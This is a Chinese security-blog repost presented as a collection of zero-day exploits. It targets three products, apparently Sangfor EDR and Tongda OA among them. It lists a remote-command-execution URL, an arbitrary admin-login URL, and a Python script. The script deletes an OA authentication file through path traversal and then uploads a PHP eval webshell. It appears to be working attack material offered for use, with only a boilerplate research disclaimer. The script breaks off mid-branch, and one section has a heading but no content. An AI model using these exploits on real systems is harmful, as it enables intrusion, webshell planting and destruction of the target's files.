sxf、trx、td(0day集合)

admin
admin
admin
140350
文章
117
评论
2023年2月23日21:20:15评论36 views字数 1202阅读4分0秒阅读模式

互联网爆料:



sxf、trx、td(0day集合)



sxf-edr

    rce:


            /tool/log/c.php?strip_slashes=system&host=id


    任意用户登录:

            

             /ui/login.php?user=admin



trx-未授权+越权


sxf、trx、td(0day集合)




td-rce

    target="http://127.0.0.1:1234/"

    payload="<?php eval($_POST['1234']);?>"

    print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")

    input("Press enter to continue")

    print("[*]Deleting auth.inc.php....")

    

    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"

    requests.get(url=url)

    print("[*]Checking if file deleted...")

    url=target+"/inc/auth.inc.php"

    page=requests.get(url=url).text

    if 'No input file specified.' not in page:

        print("[-]Failed to deleted auth.inc.php")

        exit(-1)

    print("[+]Successfully deleted auth.inc.php!")

    print("[*]Uploading payload...")

    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"

    files = {'FILE1': ('deconf.php', payload)}

    requests.post(url=url,files=files)

    url=target+"/_deconf.php"

    page=requests.get(url=url).text

    if 'No input file specified.' not in page:

        print("[+]Filed Uploaded Successfully")

        print("[+]URL:",url)

    else:


本文始发于微信公众号(Khan安全攻防实验室):sxf、trx、td(0day集合)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月23日21:20:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sxf、trx、td(0day集合)https://cn-sec.com/archives/535361.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息